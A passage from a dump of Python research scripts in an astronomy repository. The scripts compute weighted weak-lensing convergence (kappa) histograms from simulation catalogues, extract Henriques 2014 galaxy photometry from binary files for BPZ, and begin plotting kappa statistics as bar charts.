increment4/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n #print j,i\n if weightin1 == \"gamma\":\n del weight1_\n del weight2_\n del weight3_\n del weight4_\n del gamma1\n del gamma1_\n del gamma2\n del gamma2_\n del gamma\n else:\n del weight1_\n del weight2_\n del weight3_\n del weight4_\n\nprint(\" Read in %s seconds\" % (time.time() - start_time))\n\ngauss = sp.stats.norm(0, 1)\nstart1 = time.time()\nLOS = 0\n\nif conjoined == 4:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1): # use as specific value\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n for E3 in np.arange(-limsigma * E_w3_inf, limsigma * E_w3_sup + 1, increment3):\n for E4 in np.arange(-limsigma * E_w4_inf, 
limsigma * E_w4_sup + 1, increment4):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \", \"E3 = \", E3, \"in (\", -limsigma * E_w3_inf, \",\", limsigma * E_w3_sup, \") \", \"E4 = \", E4, \"in (\", -limsigma * E_w4_inf, \",\", limsigma * E_w4_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight1 >= round(constr_weight3 * med_weight1) + E3 - increment3/2.0) & (weight3 * med_weight1 < round(constr_weight3 * med_weight1) + E3 + increment3/2.0) & (weight4 * med_weight1 >= round(constr_weight4 * med_weight1) + E4 - increment4/2.0) & (weight4 * med_weight1 < round(constr_weight4 * med_weight1) + E4 + increment4/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n if E3 < 0: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_inf)\n else: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_sup)\n if E4 < 0: gauss_factorE4 = gauss.pdf(float(E4)/E_w4_inf)\n else: gauss_factorE4 = gauss.pdf(float(E4)/E_w4_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 * gauss_factorE3 * gauss_factorE4 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 3:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n for E3 in np.arange(-limsigma * E_w3_inf, limsigma * E_w3_sup + 1, increment3):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \", \"E3 = \", E3, \"in (\", -limsigma * E_w3_inf, \",\", limsigma * E_w3_sup, \") \"#, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight1 >= round(constr_weight3 * med_weight1) + E3 - increment3/2.0) & (weight3 * med_weight1 < round(constr_weight3 * med_weight1) + E3 + increment3/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n if E3 < 0: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_inf)\n else: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_sup)\n kappa_constrained = 
np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 * gauss_factorE3 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 2:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 1:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf) # for asymmetric limits, implement a gaussian on each side\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained # I tested that this addition works correctly\n LOS = LOS + data.size\n\nhead = 'LOS: %d' % np.array([LOS])\nnp.savetxt(output,unbiased_kappa_constrained,header=head,fmt='%s',delimiter='\\t',newline='\\n')\nprint(\" time for computing kappa %s seconds\" % (time.time() - start1))\n\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n print \"increment1 = \", increment1\nif (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n print \"increment2 = \", increment2\nif (conjoined == 3) | (conjoined == 4):\n print \"increment3 = \", increment3\nif conjoined == 4:\n print \"increment4 = \", increment4\n\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.47431495785713196, "alphanum_fraction": 0.5201787948608398, "avg_line_length": 84.28729248046875, "blob_id": 
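A condensed, self-contained sketch of the accumulation the conjoined == 1 loop above implements (equation 3 of Greene et al., per the script's comments): each integer offset E from the measured constraint selects a bin of lines of sight, whose kappa histogram is normalized by the number of lines of sight in that bin and down-weighted by a unit Gaussian evaluated at E over the side-dependent width. Function and argument names here are hypothetical.

import numpy as np
import scipy.stats

def accumulate_kappa(kappa, counts, target, E_inf, E_sup, limsigma, increment,
                     bins, kappa_range):
    gauss = scipy.stats.norm(0, 1)
    hist = np.zeros(bins)
    for E in np.arange(-limsigma * E_inf, limsigma * E_sup + 1, increment):
        # lines of sight whose absolute count sits in this offset bin
        sel = (counts >= target + E - increment / 2.0) & \
              (counts <  target + E + increment / 2.0)
        data = kappa[sel]
        if data.size > 0:
            # asymmetric Gaussian: lower width below the constraint, upper above
            w = gauss.pdf(float(E) / (E_inf if E < 0 else E_sup))
            hist += np.histogram(data, bins=bins,
                                 range=kappa_range)[0].astype(float) * w / data.size
    return hist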
"0aaa238dc3fbe620c7897465813dc277a00789ac", "content_id": "13400b08c43df633701d311bd5ed7961e5ff53e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15437, "license_type": "no_license", "max_line_length": 292, "num_lines": 181, "path": "/python/catalogue_utilities/testreadHenriques2014.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# extract Henriques 2014 galaxies from *.images.ugriz.txt\nimport numpy as np\npl = np.linspace(30,62,62-30 + 1)\nout = np.empty(6)\nfor i in range(len(pl)):\n print int(pl[i])\n x = np.loadtxt(\"GGL_los_8_0_0_N_4096_ang_4_Henriques2014_galaxies_on_plane_%s_f.images.ugriz.txt\" % int(pl[i]),usecols=[4,5,6,7,8,9])\n j = 0\n ind = 0\n while (j < 1000) and (ind < len(x)):\n if x[ind][4]<23:\n out = np.c_[out,x[ind]]\n j += 1\n ind += 1\nnr = np.linspace(1,len(out[0]),len(out[0]))\nnp.savetxt(\"Henriques2014selectforBPZ.cat\",np.c_[nr,out[0],out[1],out[2],out[3],out[4],out[5]],fmt='%d %1.4f %1.2f 0.00 %1.2f 0.00 %1.2f 0.00 %1.2f 0.00 %1.2f 0.00', header = 'id z_s u u_err g g_err r r_err i i_err z z_err')\n\n# now also extract from SA\nimport numpy as np\nout = np.loadtxt(\"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/original/GGL_los_8_0_0_0_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63.images.txt\",usecols=[5,12,13,14,15,16], comments=\"GalID\",unpack=True)\nnr = np.linspace(1,len(out[0]),len(out[0]))\nnp.savetxt(\"/Users/cerusu/Dropbox/Davis_work/code/0408/SAselectforBPZ.cat\",np.c_[nr,out[0],out[1],out[2],out[3],out[4],out[5]],fmt='%d %1.4f %1.2f 0.00 %1.2f 0.00 %1.2f 0.00 %1.2f 0.00 %1.2f 0.00', header = 'id z_s u u_err g g_err r r_err i i_err z z_err')\n\n# now extract from .images\nimport numpy as np\npl = np.linspace(30,62,62-30 + 1)\nout = np.empty(7)\n\ngalaxy_struct = np.dtype([\n ('galaxy_id' ,'i8' ), #0_LL $ , , id of galaxy (unique)\n ('halo_id' ,'i8' ), #0_LL $ , , id of (sub)halo, the galaxy belongs to(?)\n ('first_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('next_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('last_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('FOF_central_gal' ,'i8' ), #0_LL $ , , id of fof halo the galaxy belong to (i.e. 
common id for all galaxies in same group or cluster)\n ('file_tree_nr' ,'i8' ), #0_LL $ , , id of file containing the merger tree the galaxy belongs to\n ('descendant_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('main_leaf_id' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('tree_root_id' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('subhalo_id' ,'i8' ), #0_LL $ , , id of (sub)halo, the galaxy belongs to(?)\n ('main_subhalo_id' ,'i8' ), #0_LL $ , , id of main (sub)halo of fof halo, the galaxy belongs to(?)\n ('peano_key' ,'i4' ), #0L $ , , id of small subcube of simulation cube containing galaxy\n ('redshift' ,'f4' ), #0.0 $ , , redshift of galaxy\n ('type' ,'i4' ), #0L $ , , indicated positional status of galaxy in fof group (0 = central, 1 = satellite with subhalo, 2= satellite without resolved subhalo)\n ('snapshot_number' ,'i4' ), #0L $ , , simulation snapshot the galaxy belongs to\n ('group_number' ,'i4' ), #0L $ , , yet another id of the fof halo the galaxy belongs to\n ('next_group_number' ,'i4' ), #0L $ , , yet another id of the fof halo the galaxy will belong to in the next snapshot\n ('cube_index' ,'i4' ), #0L $ , , index of periodic copy of simulation cube the galaxy is located\n ('central_m_vir' ,'f4' ), #0.0 $ , [10^10 Msun/h] , virial mass (as defined by m_crit200) of the FOF group the galaxy resides in.\n ('central_r_vir' ,'f4' ), #0.0 $ , [Mpc/h] , virial radius (as defined by r_crit200) of the FOF group the galaxy resides in\n ('position' ,'f4', 3), #fltarr(3) $ , [rad, rad, Mpc/h] , angular position (first two components) and line-of-sight comoving distance (last component) of galaxy\n ('velocity' ,'f4', 3), #fltarr(3) $ , [km/s] , physical peculiar velocity of galaxy (first two components transverse, last component parallel to l.o.s.)\n ('len' ,'i4' ), #0L $ , , number of particle in subhalo associated with galaxy\n ('m_vir' ,'f4' ), #0.0 $ , [10^10 Msun/h] , virial mass (as defined by m_crit200) of the FOF group this galaxy was in when last it was a type 0 galaxy. I.e. current mass for type 0 galaxies, \"infall virial mass\" for type 1,2 galaxies.\n ('r_vir' ,'f4' ), #0.0 $ , [Mpc/h] , comoving virial radius (as defined by r_crit200) of the FOF group this galaxy was in when last it was a type 0 galaxy. I.e. 
current virial radius for type 0 galaxies, \"infall virial radius\" for type 1,2 galaxies\n ('v_vir' ,'f4' ), #0.0 $ , [km/s] , physical virial velocity of the subhalo the galaxy is/was the center of.\n ('v_max' ,'f4' ), #0.0 $ , [km/s] , physical maximum rotational velocity of the subhalo of which this galaxy is the center, or the last value for satellite galaxies.\n ('gas_spin' ,'f4', 3), #fltarr(3) $ , [Mpc/h km/s] , spin of the cold gas disk of galaxy\n ('stellar_spin' ,'f4', 3), #fltarr(3) $ , [Mpc/h km/s] , spin of the stellar disk of galaxy\n ('infall_v_max' ,'f4' ), #0.0 $ , [km/s] , physical maximum rotational velocity of the host halo of this galaxy atinfallSnap.\n ('infall_v_max_peak' ,'f4' ), #0.0 $ , [km/s] , physical maximum past rotational velocity of the host halo of this galaxy.\n ('infall_snap' ,'f4' ), #0L $ , , id of snapshot the galaxy lost type = 0 status\n ('infall_hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun/h] , mass in hot gas at the time of infall (same as hotGas for type 0 galaxies).\n ('hot_radius' ,'f4' ), #0.0 $ , [Mpc/h] , radius out to which hot gas extends: rvir for type 0; 0 for type 2; maximum radius out to which hot gas is not stripped for type 1.\n ('ori_merg_time' ,'f4' ), #0.0 $ , [yr] , estimated dyniamical friction time (in years) when the merger clock is set.\n ('merg_time' ,'f4' ), #0.0 $ , [yr] , estimated remaining merging time (in years). oriMergeTime - time since the merger clock is set.\n ('distance_to_central_gal' ,'f4', 3), #fltarr(3) $ , [Mpc/h (?)] , distance between this galaxy and the central galaxy of the fof group\n ('cold_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , Mass in the cold gas disk.\n ('stellar_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , total mass in stars in the disk and the bulge together.\n ('bulge_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of stars in the bulge.\n ('disk_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of stars in the disk.\n ('hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in hot gas.\n ('ejected_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in the ejected mass component\n ('black_hole_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of the central black hole\n ('ICM' ,'f4' ), #0.0 $ , (?)\n ('metals_cold_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in cold gas\n ('metals_bulge_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in bulge\n ('metals_disk_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in disk\n ('metals_hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in hot gas\n ('metals_ejected_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in the ejected mass component\n ('metals_ICM' ,'f4' ), #0.0 $ , (?)\n ('primordial_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Accretion rate of primordial gas.\n ('cooling_rate' ,'f4' ), #0.0 $ , [Msun/yr] , cooling rate\n ('cooling_rate_before_AGN' ,'f4' ), #0.0 $ , [Msun/yr] , cooling rate if there was no AGN feedback.\n ('sfr' ,'f4' ), #0.0 $ , [Msun/yr] , Star formation rate\n ('sfr_bulge' ,'f4' ), #0.0 $ , [Msun/yr] , Star formation rate in bulge.\n ('x_ray_lum' ,'f4' ), #0.0 $ , [log10(erg/sec)] , Log10 of X-Ray luminosity in erg/sec\n ('bulge_size' ,'f4' ), #0.0 $ , [Mpc/h] , Half mass radius of bulge\n ('stellar_disk_radius' ,'f4' ), #0.0 $ , [Mpc/h] , Size of the stellar disk, 3x the scale length.\n ('gas_disk_radius' ,'f4' ), #0.0 $ , [Mpc/h] , Size of the gas disk (?)\n ('cos_inclination' ,'f4' ), #0.0 $ , (?)\n ('disrupt_on' ,'i4' ), #0L $ , , 0: galaxy merged onto merger center; 1: galaxy 
was disrupted before merging onto its descendant, matter went into ICM of merger center\n ('merge_on' ,'i4' ), #0L $ , , 0: merger clock not set yet;\n ('cooling_radius' ,'f4' ), #0.0 $ , [Mpc/h] , the radius within which the cooling time scale is shorter than the dynamical timescale\n ('quasar_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Rate at which cold gas is accreted into the central black hole in the quasar mode.\n ('radio_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Rate at which hot gas is accreted into the central black hole in the radio mode.\n ('mag' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy (magnification included, dust extinction not included ?)\n ('mag_bulge' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy bulge (magnification included, dust extinction not included ???)\n ('mag_dust' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy (magnification included, dust extinction included ?)\n ('mass_weight_age' ,'f4' ), #0.0 $ , [10^9 yr] , The age of this galaxy, weighted by mass of its components.\n ('rband_weight_age' ,'f4' ), #0.0 $ , [10^9 yr] , The age of this galaxy, weighted by mass of its components.\n ('sfh_ibin' ,'i4' ), #0L $ , , Index of the higest star formation history bin currently in use.\n ('sfh_numbins' ,'i4' ), #0L $ , , Number of non-empty star formation history bins.\n ('distortion' ,'f4',(2,2)), #fltarr(4) $ , , (11, 12, 21, 22)-components of distortion matrix\n ('plane_number' ,'i4' ) #0L $ , , index of redshift slice (and lens plane) the galaxy is associated with\n ])\n\nfilter_number_for_c_johnson_U = 0\nfilter_number_for_c_johnson_B = 1\nfilter_number_for_c_johnson_V = 2\nfilter_number_for_c_johnson_rc = 3\nfilter_number_for_c_johnson_ic = 4\nfilter_number_for_vista_johnson_Z = 5\nfilter_number_for_vista_johnson_Y = 6\nfilter_number_for_vista_johnson_J = 7\nfilter_number_for_vista_johnson_H = 8\nfilter_number_for_c_johnson_K = 9\nfilter_number_for_vista_johnson_ks = 10\nfilter_number_for_i1_band = 11\nfilter_number_for_i2_band = 12\nfilter_number_for_i3_band = 13\nfilter_number_for_i4_band = 14\nfilter_number_for_u_band_trans = 15\nfilter_number_for_g_band_trans = 16\nfilter_number_for_r_band_trans = 17\nfilter_number_for_i_band_trans = 18\nfilter_number_for_z_band_trans = 19\nfilter_number_for_ACS_WFC_F435W = 20\nfilter_number_for_ACS_WFC_F475W = 21\nfilter_number_for_ACS_WFC_F606W = 22\nfilter_number_for_ACS_WFC_F625W = 23\nfilter_number_for_ACS_WFC_F775W = 24\nfilter_number_for_ACS_WFC_F814W = 25\nfilter_number_for_ACS_WFC_F850_LP = 26\nfilter_number_for_GALEX_FUV = 27\nfilter_number_for_GALEX_NUV = 28\nfilter_number_for_NIC_F110W = 29\nfilter_number_for_NIC_F160W3 = 30\nfilter_number_for_VIMOS_U = 31\nfilter_number_for_WFC3_IR_F105W = 32\nfilter_number_for_WFC3_IR_F125W = 33\nfilter_number_for_WFC3_IR_F160W = 34\nfilter_number_for_WFC3_UVIS_F225W = 35\nfilter_number_for_WFC3_UVIS_F275W = 36\nfilter_number_for_WFC3_UVIS_F336W = 37\nfilter_number_for_WFPC2_F300W = 38\nfilter_number_for_WFPC2_F450W = 39\n\nfor i in range(len(pl)):\n print int(pl[i])\n with open(\"/lfs08/rusucs/0408/GGL_los_8_0_0_N_4096_ang_4_Henriques2014_galaxies_on_plane_%s_f.images\" % int(pl[i]), mode = 'rb') as file: # b is important -> binary\n lower_bound = np.fromfile(file, 'f8', 2)\n # print(lower_bound)\n upper_bound = np.fromfile(file, 'f8', 2)\n # print(upper_bound)\n plane_angle, = np.fromfile(file, 'f8', 1)\n # print(plane_angle)\n redshift, = 
np.fromfile(file, 'f8', 1)\n # print(redshift)\n n_galaxies, = np.fromfile(file, 'i8', 1)\n # print(n_galaxies)\n n_cells = np.fromfile(file, 'i4', 2)\n # print(n_cells)\n galaxy = np.fromfile(file, galaxy_struct, n_galaxies)\n x1 = galaxy['mag'][:,filter_number_for_u_band_trans]\n x2 = galaxy['mag'][:,filter_number_for_g_band_trans]\n x3 = galaxy['mag'][:,filter_number_for_r_band_trans]\n x4 = galaxy['mag'][:,filter_number_for_i_band_trans]\n x5 = galaxy['mag'][:,filter_number_for_z_band_trans]\n x6 = galaxy['mag'][:,filter_number_for_vista_johnson_Y]\n x0 = galaxy['redshift']\n x = np.c_[x0,x1,x2,x3,x4,x5,x6]\n j = 0\n ind = 0\n while (j < 1000) and (ind < len(x)):\n if x[ind][4]<23:\n out = np.c_[out,x[ind]]\n j += 1\n ind += 1\nnr = np.linspace(1,len(out[0]),len(out[0]))\nnp.savetxt(\"Henriques2014selectforBPZwithY.cat\",np.c_[nr,out[0],out[1],out[2],out[3],out[4],out[5],out[6]],fmt='%d %1.4f %1.2f 0.00 %1.2f 0.00 %1.2f 0.00 %1.2f 0.00 %1.2f 0.00 %1.2f 0.00', header = 'id z_s u u_err g g_err r r_err i i_err z z_err Y Y_err')\n" }, { "alpha_fraction": 0.5165716409683228, "alphanum_fraction": 0.6252672672271729, "avg_line_length": 60, "blob_id": "7dbf623716b35980b08266945e90d6da69844b0c", "content_id": "139de29017a1b7fad80f345ac8abcede9123882c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5612, "license_type": "no_license", "max_line_length": 239, "num_lines": 92, "path": "/python/plot_utilities/plotkappabar_others.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code uses the output statistics produced by plotkappacompletestatistics.py/plotkappabiascompletestatistics.py in order to plot bars. Run without arguments. Make sure the uncomment the appropriate ax.set_ylim, ylabel and savefig lines\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappa/\"\ndata = np.genfromtxt('%smedstd.dat' % root,dtype=['S1000','f8','f8','f8','f8'])\n\nkappastat = np.array([])\nfor i in range(np.shape(data)[0]):\n if i == 0:\n kappastat = np.array([data[i][0],data[i][1],data[i][2],data[i][3],data[i][4]])\n else:\n x = np.array([data[i][0],data[i][1],data[i][2],data[i][3],data[i][4]])\n kappastat = np.c_[kappastat,x]\n\nkappastat = np.c_[ kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # 1-1/r\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_45_gal_45_gamma_45_oneoverr_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_45_gal_45_z_45_SIS_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_45_gal_45_zoverr_45_SIS_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_oneoverr_45_gal_45_gamma_45_mass_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_oneoverr_45_gal_45_gamma_45_z_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # 1/r\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_oneoverr_45_gal_45_mass_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z/r\n 
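The binary reader in testreadHenriques2014.py above follows a fixed header-then-records layout: scalar header fields read one at a time with np.fromfile, then a single np.fromfile call with the structured dtype, after which fields are accessed by name. A minimal sketch of that pattern, with a hypothetical two-field record standing in for the full galaxy_struct (the header sequence matches the script):

import numpy as np

# hypothetical reduced record; the real galaxy_struct has many more fields
toy_struct = np.dtype([('redshift', 'f4'), ('mag', 'f4', 40)])

def read_plane(path, record_dtype=toy_struct):
    with open(path, mode='rb') as f:
        lower_bound = np.fromfile(f, 'f8', 2)
        upper_bound = np.fromfile(f, 'f8', 2)
        plane_angle, = np.fromfile(f, 'f8', 1)
        redshift, = np.fromfile(f, 'f8', 1)
        n_galaxies, = np.fromfile(f, 'i8', 1)
        n_cells = np.fromfile(f, 'i4', 2)
        galaxies = np.fromfile(f, record_dtype, n_galaxies)
    return galaxies  # e.g. galaxies['mag'][:, 18] for one filter column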
kappastat.T[kappastat[0]=='fiducial_120_gal_120_oneoverr_45_gal_45_z_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # massoverr\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_zoverr_45_gal_45_gamma_45_mass_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overr\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_zoverr_45_gal_45_gamma_45_z_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overr\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_zoverr_45_gal_45_mass_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2rms\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_zoverr_45_gal_45_z_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3rms\n kappastat.T[kappastat[0]=='fiducial_45_gal_120_gal_120_gamma_22.5_med_increments4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overrrms\n kappastat.T[kappastat[0]=='fiducial_45_gal_120_gal_22.5_med_increments4_4_emptymsk.cat'][0][1:].astype(float), # mass3overrrms\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_120_gal_120_z_120_SIS_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # flexion\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_120_gal_120_zoverr_120_SIS_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # tidal\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_22.5_med_increments4_4_emptymsk.cat'][0][1:].astype(float)]#, SIS]\n\nlabels = ( '120galgamma1/r45gal1/r', # 1\n '120galgamma45galgamma1/r', # 2\n '120galgamma45galzSIS', # 3\n '120galgamma45galz/rSIS', # 4\n '120gal1/r45galgammamass', # 5\n '120gal1/r45galgammaz', # 6\n '120gal1/r45galmass', # 7\n '120gal1/r45galz', # 20\n '120galz/r45galgammamass', # 8\n '120galz/r45galgammaz', # 23\n '120galz/r45galmass', # 27\n '120galz/r45galz', #\n '45gal120galgamma', # 21\n '45gal120gal',\n '45galgamma120galzSIS', # 22\n '45galgamma120galz/rSIS',\n '45galz/r'\n)\n\nN = 17\nind = 2 * np.arange(N) # the x locations for the groups\nwidth = 0.8 # the width of the bars\n\nax = plt.subplot(2,1,1)\n\ncol1 = (kappastat[0])\nrects1 = ax.bar(ind + 2*width, col1, width, 